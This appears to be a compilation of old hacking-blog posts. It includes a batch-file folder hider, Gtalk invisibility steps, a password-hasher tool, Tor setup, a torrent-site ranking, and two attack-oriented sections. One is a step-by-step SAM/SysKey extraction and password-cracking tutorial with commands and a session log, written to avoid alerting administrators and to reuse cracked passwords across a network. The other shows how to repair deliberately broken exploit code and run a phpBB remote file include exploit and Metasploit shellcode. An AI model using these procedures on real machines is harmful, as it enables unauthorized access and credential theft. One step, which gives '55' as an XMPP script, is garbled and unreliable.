Protected windows folder

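Change Pass to the password you want. The password sits in plain text inside the batch file and the folder is only renamed and hidden, so this keeps the folder out of casual view rather than protecting its contents.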

@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if /I "%cho%"=="Y" goto LOCK
if /I "%cho%"=="N" goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT "%pass%"=="Pass" goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End

Go invisible on Gtalk

See this video:

http://www.metacafe.com/watch/1083191/invisible_in_gtalk/

-----------------------------

Or follow these steps:

1. Download this software

http://sourceforge.net/project/downloading.php?groupname=psi&filename=psi-0.10-win-setup.exe&use_mirror=jaist

2. Go to account setup

3. click add

4. give any name

5. click add

6. in front of jabber id put your GTALK ID

7. password is your GTALK ID password

8. save

9. click on connection tab

10. check on all checkboxes

11. in host put : talk.google.com

12. right click your profile name

13. Right click on profile name

14. click on XML console

15. check the box of Enable

16. put this in script field

55

17. click on transmit

18. You are invisible

How it works

See this also if you have a problem:

http://psi-im.org/wiki/Google_Talk_HowTo_for_Psi_0.9.3




Very simple: it is just a manipulation of the XMPP protocol.

XMPP is the protocol that the IM service (Gtalk) works on.

Password Hasher Firefox Extension


Well, seeing as we were talking about breaking passwords, here’s a tool for Firefox to help you manage your more secure passwords.

Better security without bursting your brain

Password Hasher is a Firefox security extension for generating site-specific strong passwords from one (or a few) master key(s).

What good security practice demands:

      Strong passwords that are hard to guess.
      Different passwords at each site.
      Periodically changing existing passwords.

Why you probably aren’t practicing good security:

      Strong passwords are difficult to remember.
      Juggling a multitude of passwords is a pain.
      Updating passwords compounds the memorization problem.

How Password Hasher helps:

  • Strong passwords are automatically generated.
  • The same master key produces different passwords at many sites.
  • You can quickly upgrade passwords by “bumping” the site tag.
  • You can upgrade the master key without updating all sites at once.
  • It supports different length passwords.
  • It supports special requirements, such as digit and punctuation characters.
  • All data is saved to the browser’s secure password database.

You can download Password Hasher here:

passhash-1.0.5.xpi
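
The derivation idea behind the list above, as an added Python example that is not Password Hasher's own code: it uses PBKDF2-HMAC-SHA256 as an assumed stand-in for the extension's algorithm, and `derive_password`, `bump` and the `:N` tag suffix are hypothetical names and conventions.

```python
import hashlib
import string

ALNUM = string.ascii_letters + string.digits
PUNCT = "!#$%&*+-=?@"
ITERATIONS = 100_000  # assumed work factor; slows offline guessing of the master key


def derive_password(master_key, site_tag, length=12, need_digit=True, need_punct=True):
    """Derive a site-specific password from one master key and a site tag."""
    if not 4 <= length <= 28:
        raise ValueError("length must be between 4 and 28")
    # The site tag acts as the salt, so every tag gives an unrelated output.
    raw = hashlib.pbkdf2_hmac("sha256", master_key.encode(), site_tag.encode(),
                              ITERATIONS, dklen=32)
    # The first `length` bytes choose the characters (slight modulo bias, fine for a demo).
    chars = [ALNUM[b % len(ALNUM)] for b in raw[:length]]
    # The last four bytes place required character classes deterministically.
    punct_at = None
    if need_punct:
        punct_at = raw[-1] % length
        chars[punct_at] = PUNCT[raw[-2] % len(PUNCT)]
    if need_digit and not any(c.isdigit() for c in chars):
        digit_at = raw[-3] % length
        if digit_at == punct_at:
            digit_at = (digit_at + 1) % length
        chars[digit_at] = string.digits[raw[-4] % 10]
    return "".join(chars)


def bump(site_tag):
    """Return the next version of a tag: 'example' -> 'example:1' -> 'example:2'."""
    name, sep, version = site_tag.rpartition(":")
    if sep and version.isdigit():
        return f"{name}:{int(version) + 1}"
    return f"{site_tag}:1"


if __name__ == "__main__":
    master = "correct horse battery staple"  # constructed sample master key
    for tag in ("example.com", "mail.example.org", bump("example.com")):
        print(f"{tag:20} {derive_password(master, tag)}")
```

Nothing but the site tags needs to be remembered per site; replacing one site's password means bumping its tag, and the other sites' passwords do not change.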





Cracking Syskey and the SAM on Windows XP, 2000 and NT 4


SysKey is an extra level of encryption put on the hashes in the SAM file [1]. SysKey was introduced in Service Pack 3 (SP3) for NT 4 but every version of Windows since has had SysKey enabled by default. The way most folks crack a SAM file on a system that uses SysKey is by running a utility called PWDump as an admin to get the LM (LAN Manager) and NT hashes. The problem is PWdump only works if you can run it from an administrator level account, and if the reason an attacker is cracking the hashes in the first place is to get an administrator level account then PWdump is of little use.

Some folks will ask why you would want to crack the passwords in the SAM at all since it’s far easier to just change the Administrator password using a Linux boot disk or Sala’s Password Renew for PE Builder. The reason an attacker may want to crack the local passwords instead of changing them is twofold:

1. An attacker doesn’t want to tip off the system administrators. If they notice that the old local admin password no longer works they will get a little bit suspicious, don’t you think? This is somewhat solved by Sala’s Password Renew since it lets you add new admin level accounts as well as change existing accounts’ passwords.

2. The same local account passwords may be used on other systems on the network (and most likely are if they use imaging software like Ghost). If the attacker can crack one machine’s admin password that same password may allow the attacker to gain access to other boxes on that LAN that they only have remote access (across the network) to.

This article assumes that the attacker has only physical access to the machine whose SAM they want to crack and that they also have access to the Knoppix variant known as the Auditor security collection boot CD [5] (I’m using version 120305-01 in this tutorial). Here are the steps you will need to take in order to audit local passwords using the Auditor CD:

Step 1. Download the Auditor Boot CD ISO and burn it to a CD-R. All of the tools we will be using in this tutorial come on the Auditor Boot CD.

Step 2. Insert the Auditor Boot CD into the target system, reboot and set the CD-ROM as the first boot device in the BIOS. Some systems let you hold down a certain function key at startup to choose what media to boot from (on recent Dells it’s F12).

Step 3. Auditor will begin to boot and ask you what screen resolution you want to use. Choose a resolution that your monitor and video card will support (I use 2 for 1024x768) then hit enter.

Step 4. When Auditor finishes booting click on the icon on the KDE bar for a new terminal window (it looks like a little monitor). Below you will see the commands you will have to use to get past SysKey, extract the hashes and attempt to crack the password hashes.

Step 5. Mount the local hard disk, most likely hda1:

Linux Command:

mount /dev/hda1



Step 6. Change the present working directory to the ramdisk so we have space to work with the files we will be creating:

Linux Command:

cd /ramdisk/


Step 7. Auditor comes with Ncuomo’s Samdump2 and Bkhive [6]. We will be using these tools to extract the system key from the System hive and the password hashes from the SAM file. To get the system key we need to use Bkhive on our SYSTEM file (most likely in C:\WINDOWS\system32\config\SYSTEM, that’s where it is on my XP Pro test box; on some systems it will be in C:\WINNT\system32\config\SYSTEM or perhaps on some other drive entirely). By the way, if for some reason you are running NT4 SP3 you will need to use Bkreg instead; all later systems (NT4 SP4, 2000 and XP) use Bkhive. To grab the system key and put it into a file we use the following command:

Linux Command:

bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt


Step 8. Now that we have the system key we can use it to undo SysKey on the SAM, extract the hashes and place them into a PWDump format file:

Linux Command:

samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt>password-hashes.txt


Step 9. At this point we have a PWDump format file called password-hashes.txt that we could copy off of the system and import into L0phtcrack [7] or Cain [8] (see the old tutorial for details). Since I said we were going to do it all with the Auditor CD and Open Source tools we will use John the Ripper to crack the hashes, but before we can use John we have to extract one of the many wordlists that come with Auditor. Take a look on the CD in /opt/auditor/full/share/wordlists/ for all of the different wordlists you can use; I’ll use english.txt for this tutorial. To extract english.txt to the ramdisk use the following command:

Linux Command:

gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt




Step 10. Now that everything is in place we can run John with a simple dictionary attack to see if we can crack any of the hashes:

Linux Command:

john password-hashes.txt -w:eng.txt


John detects that the dump file has LM (LAN Manager) hashes in it and chooses the format “NT LM DES [32/32 BS]” automatically. If I had disabled the storing of LM hashes in the SAM I might want to use the -f option to specify the NT hash format and try to crack the NT hashes instead. To do that I would use the following command:

Linux Command:

john password-hashes.txt -f:NT -w:eng.txt


If dictionary attacks aren’t working and you have a lot of time (as well as a fast computer) you can try John’s incremental (brute force) mode and see if it gives you better results:

Linux Command:

john password-hashes.txt -i:all


Incremental mode is limited to only eight characters unless you change the source before you compile it, but at more than eight characters you will likely be waiting a very long time for John to finish. Doing more than eight characters is pointless anyway if you have the LM hashes since they are stored as two seven-byte parts (NT hashes are a different story and can be harder to crack).

In case you were wondering what all of these commands would look like along with their output here is a copy of my session log that may help you understand how they all work together (notice that the password for the Administrator account is “monkey”):

Session Log saved from Auditor CD:

root@1[~]# mount /dev/hda1
root@1[~]# cd /ramdisk/
root@1[ramdisk]# bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt
Bkhive ncuomo@studenti.unina.it

Bootkey: 407af4376e55f1fd6d58cc47a4fa4c01
root@1[ramdisk]# samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt>password-hashes.txt
Samdump2 ncuomo@studenti.unina.it
This product includes cryptographic software written
by Eric Young (eay@cryptsoft.com)

No password for user Guest(501)
No V value!
root@1[ramdisk]# gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt
root@1[ramdisk]# john password-hashes.txt -w:eng.txt
Loaded 3 password hashes with no different salts (NT LM DES [32/32 BS])
MONKEY (Administrator)
guesses: 1 time: 0:00:00:03 100% c/s: 1622943 trying: ZZYZX - ZZZZZZZ
root@1[ramdisk]# john password-hashes.txt -f:NT -w:eng.txt
Loaded 2 password hashes with no different salts (NT MD4 [TridgeMD4])
monkey (Administrator)
guesses: 1 time: 0:00:00:12 100% c/s: 464435 trying: zzzzzzzzzzzzzzzzzzzzzz
root@1[ramdisk]#



Mitigating SAM and SysKey Cracking

There are a few things you can do to make it harder for an attacker to crack your local passwords. An attacker will most likely have to get into the BIOS to set it to boot from the CD-ROM. Setting up a BIOS password will help keep crackers from using the Auditor CD (or any boot CD), but if they can get into the computer’s case it’s easy to reset a BIOS password, so some sort of physical case lock should be used as well. Strong passwords (non-dictionary words with more than just alphanumeric characters) will also make it harder for attackers to crack passwords since they will have to resort to potentially slow brute force methods.
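
To check how exposed a machine you administer is, a PWDump-format file can be audited without cracking anything: it shows which accounts still store LM hashes, which passwords fit in one seven-character LM half, and which accounts share a password. The following Python is an added example, not part of the original tutorial; the sample dump is constructed with placeholder hash values, and `audit` and the finding names are hypothetical.

```python
import re
from collections import defaultdict

EMPTY_LM_HALF = "aad3b435b51404ee"              # LM value of an empty seven-byte half
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password
HEX32 = re.compile(r"^[0-9a-f]{32}$")

# Constructed sample in PWDump format (user:rid:lm:nt:::); the non-empty
# hash values are placeholders, not hashes of real passwords.
SAMPLE_DUMP = """\
Administrator:500:1111111111111111aad3b435b51404ee:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
backup:1003:22222222222222223333333333333333:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:::
alice:1004:aad3b435b51404eeaad3b435b51404ee:bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb:::
"""


def parse_pwdump(text):
    """Yield (user, rid, lm, nt); a field that is not 32 hex digits becomes None."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # skip banners and malformed lines
        lm, nt = (p.lower() if HEX32.match(p.lower()) else None for p in parts[2:4])
        yield parts[0], int(parts[1]), lm, nt


def audit(text):
    """Map each account name to a list of findings about its stored hashes."""
    rows = list(parse_pwdump(text))
    by_nt = defaultdict(list)
    for user, _, _, nt in rows:
        if nt and nt != EMPTY_NT:
            by_nt[nt].append(user)
    report = {}
    for user, _, lm, nt in rows:
        findings = []
        if nt is None or nt == EMPTY_NT:
            findings.append("blank_password")
        if lm and lm != EMPTY_LM_HALF * 2:
            findings.append("lm_hash_stored")       # LM storage not disabled
            if lm[16:] == EMPTY_LM_HALF:            # second half empty
                findings.append("password_7_chars_or_fewer")
        if nt in by_nt and len(by_nt[nt]) > 1:
            findings.append("nt_hash_shared")       # same password on several accounts
        report[user] = findings
    return report


if __name__ == "__main__":
    for user, findings in audit(SAMPLE_DUMP).items():
        print(f"{user:15} {', '.join(findings) or 'ok'}")
```

Accounts flagged `lm_hash_stored` are the ones for which disabling LM hash storage and setting a new password removes the weaker hash; `nt_hash_shared` is the reused-local-password case described earlier for imaged machines.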

I hope this short tutorial helps, feel free to write me if you have any questions. Some other techniques you may want to look into for faster cracking are cracking clusters [9] and Rainbow tables [10]. Enjoy your hash. :)





Get IP address anonymity every time

I have found software that hides your IP address every time and gives you a new IP address by creating a Tor network.

If you have Mozilla then it works very well.

First download the Vidalia Bundle from here:


http://www.torproject.org/download.html.en

The links there are for Windows and Mac OS, so download the one that matches your requirements.

After that, to easily turn Tor on and off, you can install the Firefox add-on from here:


https://addons.mozilla.org/en-US/firefox/addon/2275

Then restart Firefox. After that you will see at the bottom right corner that the Tor add-on for Mozilla is installed. Now when you want to hide your IP or surf anonymously, turn it on or off by clicking on this.

You can check your ip address here

http://www.whatismyip.com/

Using exploits. Includes noob protection


Posted: Fri Dec 28, 2007 4:46 pm

I will discuss ways to handle and compile exploits. A lot of exploits come with "noob protection". Noob protection means they will move or add sections of text or scramble a simple statement so people immediately know that it shouldn't be that way. This protects against skiddies and noobs getting and running the exploit. I will show you how to compile exploits with Dev C++ and run Perl and PHP scripts. I will also include the entire remote library from milw0rm compiled in complete.

Downloads: dev c++, perl (win), perl (source), openSSL (win)

WSAStartup
Quote:
[linker error] undefined reference to `WSAStartup@8'
[linker error] undefined reference to `socket@12'

Open dev c++ options

in the main window will be a checkbox that says "Add the following commands when calling the compiler" type this in the box -lwsock32

press ok and compile again.
----

Using Shellcodes
You can generate shellcodes for Metasploit projects with ease. Here is one I made for this post:
Code:
/* win32_exec - EXITFUNC=seh CMD=shutdown -f -s Size=168 Encoder=PexFnstenvSub http://metasploit.com */
You can use that code and replace the shellcode in any exploit that uses the shellcode. You can generate new shellcodes here: http://metasploit.com:55555/PAYLOADS. First, select the payload you wish to use.

Then type the command you want it to execute, then press "generate payload".

Your shellcode should be printed out nicely for you.
- - -

Perl Exploits
If you're using Windows, install this msi package. Let's use an example Perl script from milw0rm. http://www.milw0rm.com/exploits/3661

Save that exploit to your c: drive as a file called "3661.pl". This exploit just generates an HTML file exploit, "exploit.html". It's that simple. But some exploits require you to have SSL installed, so you can grab that for Windows at the top of this post with the other downloads. Some exploits may require you to pass "arguments" to the application, like this exploit.

uh oh, noob protection?




syntax error at C:2552.pl line 47, near "print"
Execution of C:2552.pl aborted due to compilation errors.






Well, instantly I see that the line with $vul= has no ";" at the end of it. Put that in there so it looks like this:




$host=$ARGV[0];
$path=$ARGV[1];
$vul="phpbb_security.php?phpbb_root_path=";





Now save it and try again. YAY




C:>2552.pl

################################################## ########################
# #
# phpBB Security <= 1.0.1 Remote File Include Vulnerability #
# Bug found By : Ashiyane Corporation #
# Email: nima salehi nima[at]ashiyane.ir #
# Web Site : www.Ashiyane.ir #
# #
################################################## ########################

Usage: Ashiyane.pl [host] [path]




EX : Ashiyane.pl www.victim.com /path/





Most Popular Torrent Sites of 2007

1. Mininova

Without a doubt the most visited BitTorrent site. In November, Mininova reached a milestone by entering the list of the 50 most visited websites on the Internet.

Alexa rank: 46
2. IsoHunt

IsoHunt continued to grow this year. In September they were forced to close their trackers to US traffic because of the issues they have with the MPAA, but this had no effect on the visitor count.

Alexa rank: 143
3. The Pirate Bay

The Pirate Bay has been in the news quite a bit this year and remains not only the most used BitTorrent tracker, but also one of the most visited BitTorrent sites. At the moment they are fighting with IsoHunt for the second place in this list.

Alexa rank: 147
4. Torrentz

Torrentz is the only “torrent site” in the top 10 that doesn’t host .torrent files. Several improvements and new features have been introduced over the past year such as a comment system, private bookmarks and a cleaner layout.

Alexa rank: 160
5. BTjunkie

BTjunkie was one of the fastest risers last year and continued to grow throughout 2007. Last month they were, like many others, forced to leave their ISP (LeaseWeb), but the transition to a new host went smoothly and didn’t result in any downtime.

Alexa rank: 445
6. TorrentSpy

TorrentSpy was the most popular BitTorrent site of 2006, but dropped to sixth place due to legal issues with the MPAA. To ensure the privacy of their users, TorrentSpy decided that it was best to block access to all users from the US, causing their traffic to plunge.

Alexa rank: 461
7. TorrentPortal

Not much news about TorrentPortal this year, but that probably is a good thing. Like most other sites they have grown quite a bit in 2007.

Alexa rank: 481
8. GamesTorrents

It’s quite a surprise to see GamesTorrents in the list of 10 most popular BitTorrent sites of 2007. This Spanish BitTorrent site had a huge dip in traffic earlier this year but managed to secure 8th place.

Alexa rank: 583
9. TorrentReactor

TorrentReactor.net has been around for quite a while, four years to be exact, and is still growing.

Alexa rank: 604
10. BTmon

BTmon was one of the newcomers in 2006, and it is the youngest BitTorrent site in the top 10 this year.

Alexa rank: 673
Honorable Mention: Demonoid

For being one of the most visited BitTorrent sites until they pulled the plug in Novembe